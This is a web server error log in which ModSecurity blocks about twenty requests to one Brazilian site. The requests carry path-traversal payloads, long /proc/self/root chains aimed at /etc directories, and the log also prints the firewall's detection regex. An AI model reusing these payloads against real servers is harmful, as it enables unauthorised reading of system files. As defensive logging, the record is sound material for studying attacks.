[Tue Mar 17 08:57:38.721248 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.241.46:53282] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBsqBJNF7axNlVR0X4hQAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:38.883148 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.243.203:55456] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBsu82sZHvlq4xgHq-4QAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:42.755445 2026] [:error] [pid 11293:tid 140411658000128] [client 74.7.243.203:51024] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBttCmCSWTlPouqorG5QAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:50.807680 2026] [:error] [pid 1210:tid 140411666392832] [client 74.7.241.46:43496] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBvlKJy4A1bGlmj9BQrQAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:55.623534 2026] [:error] [pid 7000:tid 140411590858496] [client 74.7.241.46:57650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBwxePVOt35XCGZP8rjgAAA5I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:55.900835 2026] [:error] [pid 1961:tid 140411691570944] [client 74.7.243.203:51040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBw3RXaaWotPICgYsgcAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:56.918671 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.241.46:57658] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBxAeiSKl8TjouI-b9lwAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:57.194095 2026] [:error] [pid 1210:tid 140411699963648] [client 74.7.243.203:35816] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBxVKJy4A1bGlmj9BQrwAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:58.548997 2026] [:error] [pid 1961:tid 140411574073088] [client 74.7.243.203:35826] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBxnRXaaWotPICgYsgcwAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:59.180331 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.241.46:49340] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBx9CmCSWTlPouqorG6wAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:59.855445 2026] [:error] [pid 1961:tid 140411674785536] [client 74.7.243.203:35840] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBx3RXaaWotPICgYsgdAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:00.486477 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.241.46:49348] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablByAeiSKl8TjouI-b9mgAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:58:01.159123 2026] [:error] [pid 2305:tid 140411733534464] [client 74.7.243.203:49228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablByQQohV2v-7oj5HH2kgAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:01.679935 2026] [:error] [pid 1210:tid 140411540502272] [client 74.7.241.46:49358] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablByVKJy4A1bGlmj9BQsQAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:58:02.644233 2026] [:error] [pid 2305:tid 140411741927168] [client 74.7.243.203:49240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBygQohV2v-7oj5HH2lAAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:03.955617 2026] [:error] [pid 2305:tid 140411708356352] [client 74.7.243.203:49250] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBywQohV2v-7oj5HH2mAAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:05.362108 2026] [:error] [pid 1961:tid 140411716749056] [client 74.7.243.203:49258] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBzXRXaaWotPICgYsgdQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:06.564278 2026] [:error] [pid 11293:tid 140411624429312] [client 74.7.243.203:49266] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBztCmCSWTlPouqorG7QAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:07.891053 2026] [:error] [pid 11293:tid 140411574073088] [client 74.7.243.203:49280] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBz9CmCSWTlPouqorG7wAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:09.156993 2026] [:error] [pid 1961:tid 140411649607424] [client 74.7.243.203:49282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB0XRXaaWotPICgYsgdgAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:10.453231 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.243.203:50180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB0geiSKl8TjouI-b9pAAAA8U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
